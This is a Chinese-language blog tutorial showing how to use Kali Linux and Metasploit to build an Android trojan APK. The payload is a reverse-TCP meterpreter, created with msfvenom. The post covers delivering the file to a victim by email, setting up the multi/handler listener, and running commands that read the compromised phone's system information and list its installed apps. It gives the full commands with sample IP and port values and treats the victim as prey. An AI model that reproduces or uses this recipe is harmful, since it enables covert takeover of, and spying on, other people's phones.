当前位置：首页 > news >正文

Kali Linux使用Metasploit生成木马入侵安卓系统

news 2026/2/9 14:57:30

额，这是我最后一篇文章了，周一我们开学了

文章目录

前言
一、Metasploit是什么？
- 演示环境
二、生成可执行木马文件
- 1.生成
- 2.运行命令并生成木马
- 配置参数
- 入侵安卓手机命令
- - 1.查看对方手机系统信息
  - 查看对方手机安装哪些app文件
总结

前言

前言，前言这是我最难想出来的
对，这是我最后一篇文章，周一我们开学了，漏洞实战怕实现不了，至少放假可以更文章，我们只放一天，

提示：以下是本篇文章正文内容，下面案例可供参考

一、Metasploit是什么？

Metasploit是一个免费的、可下载的框架，通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时，计算机安全状况也被永久性地改变了。仿佛一夜之间，任何人都可以成为黑客，每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。软件厂商再也不能推迟发布针对已公布漏洞的补丁了，这是因为Metasploit团队一直都在努力开发各种攻击工具，并将它们贡献给所有Metasploit用户。
Metasploit的设计初衷是打造成一个攻击工具开发平台，本书稍后将讲解如何开发攻击工具。然而在目前情况下，安全专家以及业余安全爱好者更多地将其当作一种点几下鼠标就可以利用其中附带的攻击工具进行成功攻击的环境。
工作方式编辑

演示环境

攻击方：kali Linux 2022.4
被攻击方：Android13 oppo color13.0

二、生成可执行木马文件

1.生成

msfvenom -p android/meterpreter/reverse_tcp LHOST=<本地ip> LPORT=<本地端口号> R > <文件名>.apk

示例

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.127 LPORT=5555 R >Android.apk

本地端口自己随便设置一个没有被占用的端口号，如果端口号被占用那么文件会生成失败，换一个端口号就性
如何查看IP地址，用ifconfig可以看到
在这里插入图片描述

2.运行命令并生成木马

在这里插入图片描述
look，生成成功了，一定要用root权限打开，

然后发送，我喜欢用邮箱发送这比较快

look ther这样比较快，

呃…安卓13防御能力不怎样啊
然后打开msfconsole

配置参数

(1)命令： use exploit/multi/handler（选择模块）
(2)命令： set payload android/meterpreter/reverse_tcp（选择攻击模块）
(3)命令： set LhOST 192.168.0.127（填写自己主机的IP地址）
(4)命令： set lport 5555（填写刚才生成文件时的端口号）
(5)命令： show options（查看设置参数）
(6)命令： exploit （执行）
在这里插入图片描述
好了，就等小鱼上钩了

安装完成了

成功了

入侵安卓手机命令

1.查看对方手机系统信息

sysnif

在这里插入图片描述

查看对方手机安装哪些app文件

applist

总结

时间不够了，所以不做演示了,所以再见